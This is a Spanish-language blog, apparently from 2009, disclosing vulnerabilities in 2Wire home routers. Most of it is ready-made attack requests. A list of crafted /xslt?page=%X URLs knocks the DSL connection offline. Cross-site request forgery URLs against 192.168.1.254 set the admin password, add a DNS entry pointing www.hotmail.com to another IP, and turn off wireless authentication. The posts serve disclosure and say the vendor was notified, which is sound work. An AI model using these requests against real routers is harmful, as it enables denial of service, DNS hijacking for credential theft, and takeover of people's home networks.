http://gateway.2wire.net/xslt?page=%&
http://gateway.2wire.net/xslt?page=%@
http://gateway.2wire.net/xslt?page=%!
http://gateway.2wire.net/xslt?page=%+
http://gateway.2wire.net/xslt?page=%;
http://gateway.2wire.net/xslt?page=%'
http://gateway.2wire.net/xslt?page=%~
http://gateway.2wire.net/xslt?page=%*
http://gateway.2wire.net/xslt?page=%0
http://gateway.2wire.net/xslt?page=%9
http://gateway.2wire.net/xslt?page=%?
etc...
Modelos Vulnerables: 1701HG, 1800HW, 2071HG, 2700HG Gateway
Software: v3.17.5, 3.7.1, 4.25.19, 5.29.51
martes, 10 de marzo de 2009
Dsl-DoS
La conexion DSL de los ruteadores 2wire se puede reiniciar con hacer una peticion a /xslt con el valor %X donde X es cualquier caracter que no es de la A-z. Ejemplo:
miércoles, 4 de marzo de 2009
Vulnerabilidades en ruteadores 2Wire (algunas versiones)
Routers Vulnerables: 1701HG, 1800HW, 2071 Gateway
Software: 3.17.5, 3.7.1, 5.29.51 Contraseña No establecida
http://www.2wire.com fue Notificado
I. Información
-------------
Son los ruteadores más populares de México y su
consola de administración web no
tiene password por defecto.
II. Vulnerabilidad
----------------
Es posible hacer que el cliente realice una petición al
ruteador y modifique
cualquier configuración.
No valida POST ni Referer ni nada.
III. "Exploit"
--------
Solo necesitamos hacer que el cliente realice alguna petición
con la configuración
que queramos.
[ejemplos]
Ponerle password (NUEVOPASS):
http://192.168.1.254/xslt?PAGE=A05_
POST&THISPAGE=A05&NEXTPAGE=A05_
POST&ENABLE_PASS=on&PASSWORD=NUEVOPASS&PASSWORD_
CONF=NUEVOPASS
Agregar un registro DNS (74.125.19.99 www.hotmail.com):
http://192.168.1.254/xslt?PAGE=J38_
SET&THISPAGE=J38&NEXTPAGE=J38_
SET&NAME=www.hotmail.com&ADDR=74.125.19.99
Deshabilitar Autenticación inalámbrica
http://192.168.1.254/xslt?PAGE=C05_
POST&THISPAGE=C05&NEXTPAGE=C05_
POST&NAME=encrypt_enabled&VALUE=0
Suscribirse a:
Entradas (Atom)